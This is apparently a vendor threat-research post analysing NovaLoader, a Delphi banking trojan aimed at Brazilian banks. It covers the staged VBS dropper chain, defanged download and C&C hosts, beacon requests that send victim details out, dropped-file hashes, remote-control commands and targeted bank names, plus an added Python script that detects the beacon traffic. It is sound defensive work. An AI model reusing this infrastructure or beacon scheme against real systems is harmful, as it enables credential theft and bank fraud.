As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.
Delivery method
In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS.
NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.
Fig.1: NovaLoader Infection flow
Main Dropper
MD5: 4ef89349a52f9fcf9a139736e236217e
The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.
Fig. 2: Stage 1 VB script decryption loop
Stage 1 Script
Embedded script before and after decryption:
Fig. 3: VB script before and after decryption
This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption.
Fig. 4: Download request for the next stage, an encrypted payload
Stage 2 Script
Downloaded VB script looks like the following after decryption:
Fig. 5: VBS after decryption
The VB script sends a GET request to “http://54.95.36[.]242/contaw.php”, possibly to let the command-and-control (C&C) server know that it is running on the system. After that it tries to detect the presence of a virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.
Fig. 6: VM detection code
NovaLoader then copies the following executable files into the directory C:\Users\Public\:
C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll
Fig. 7: C&C notification request
After that it downloads the following files from 32atendimentodwosgraumell[.]club:
32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip
Then it sends multiple GET requests to “54.95.36[.]242/contaw{1-7}.php”:
Fig. 8: Multiple C&C requests
GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
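The beacon requests above carry victim details in the `w=` parameter (hostname, OS string, a timestamp, disk sizes), separated by underscores. The following added example, not part of the original report, flags requests matching the observed `/contaw{N}.php` path pattern in simplified, constructed proxy log lines and unpacks the `w=` fields so an analyst can see what was exfiltrated; the log line format and the hostname `VICTIM-PC` are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines in an assumed "<client> <method> <url>" layout.
# Hostname and IP are placeholders; paths mirror the requests seen in the campaign.
SAMPLE_LOG = """\
10.0.0.7 GET http://54.95.36.242/contaw.php
10.0.0.7 GET http://54.95.36.242/contaw2.php?w=VICTIM-PC_Microsoft%20Windows%207%20Professional%20_True
10.0.0.7 GET http://54.95.36.242/contaw6.php?w=VICTIM-PC_2/1/2019%205:05:06%20PM
10.0.0.7 GET http://54.95.36.242/contaw7.php?w=VICTIM-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
10.0.0.9 GET http://example.org/contact.php?id=7
"""

# Path pattern observed in the campaign: /contaw.php and /contaw2.php .. /contaw7.php
BEACON_PATH = re.compile(r"^/contaw[1-7]?\.php$")


def parse_beacon(url):
    """Return a dict describing the beacon, or None if the URL is not one."""
    u = urlparse(url)
    if not BEACON_PATH.match(u.path):
        return None
    stage = u.path[len("/contaw"):-len(".php")] or "0"   # bare contaw.php -> stage 0
    info = {"host": u.netloc, "stage": int(stage), "fields": []}
    w = parse_qs(u.query).get("w")          # parse_qs already percent-decodes
    if w:
        # The value is '_'-separated: hostname first, then OS / timestamp / disk sizes
        info["fields"] = [f.strip() for f in w[0].strip("_").split("_")]
    return info


def find_beacons(log_text):
    """Scan constructed log text and return every matching beacon with its client IP."""
    hits = []
    for line in log_text.splitlines():
        client, _method, url = line.split(" ", 2)
        beacon = parse_beacon(url)
        if beacon:
            beacon["client"] = client
            hits.append(beacon)
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```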
It will also drop several files into the C:\Users\Public\ directory:
| Dropped files | MD5 | Comment |
|---|---|---|
| DST.exe | 51138BEEA3E2C21EC44D0932C71762A8 | copied rundll32.exe |
| I | 3DC26D510907EAAC8FDC853D5F378A83 | encrypted file containing various values like version, extension etc. |
| I_ | A34F1D7ED718934185EC96984E232784 | encrypted configuration file |
| KC | 89473D02FEB24CE5BDE8F7A559631351 | similar to file named "I" |
| mwg.dll | F3F571288CDE445881102E385BF3471F | copied magnification.dll |
| PFPQUN.DST | 8C03B522ACB4DDC7F07AB391E79F1601 | support dll to decrypt main payload |
| PFPQUN1.DST | F3D4520313D05C66CEBA8BDA748C0EA9 | encrypted main payload |
| winx86.dll | 87F9E5A6318AC1EC5EE05AA94A919D7A | Sqlite dll |
Fig. 9: Files dropped by script
Finally, it executes an exported function of the decrypted DLL using the copied rundll32.exe.
Fig. 10: Executing the stage-3 payload
The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.
Final payload
The final payload is written in Delphi. It has multiple capabilities, including stealing victims' credentials for several Brazilian banks. It monitors browser window titles for bank names and, if a targeted tab is found, the malware can take control of the system and block the victim from the real bank page while carrying out its fraudulent activity under direction from its C&C. Its behaviour is quite similar to the well-known Overlay RAT.
Some of the interesting commands used by the malware include:
| Command String | Description |
|---|---|
| <\|SocketMain\|> | To stabilize socket connection |
| <\|Info\|> | Sends infected OS details |
| <\|PING\|> | Checking status of the connection |
| <\|Close\|> | Close all connections |
| <\|REQUESTKEYBOARD\|> | Sends keystrokes to the active application window |
| <\|MousePos\|> | Set mouse position |
| <\|MouseLD\|> | Set mouse left button down |
| <\|MouseLU\|> | Set mouse left button up |
| <\|MouseRD\|> | Set mouse right button up |
| <\|MouseRU\|> | Set mouse right button down |
| <\|Desktop\|> | Share compromised system desktop |
| <\|gets\|> | Checks for "gets" in the C&C response to confirm the data is correct, then replies with <\|okok\|> |
Fig. 11: NovaLoader C&C commands
There were many interesting strings related to Brazilian banks found in the malware:
| Strings in malware | Corresponding bank site |
|---|---|
| caixa | |
| bancodobrasil | |
| bbcombr | |
| bradesco | |
| santander | |
| bancodaamazonia | |
| brbbanknet | |
| banese | |
| banestes | |
| bancodoestadodopar | |
| bancobs2 | |
| citibankbrasil | |
| bancofibraonline | |
| bancoguanabara | http://www.bancoguanabara.com.br/ |
| ccbbrasil | |
| bancoindusval | |
| internetbankingbancointer | |
| modalbanking | |
| bancopan | |
Fig. 12: Some of the targeted bank strings found in the malware
Conclusion
Brazilian actors are among the top contributors to global cybercrime, and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.
IOCs
MD5
URLs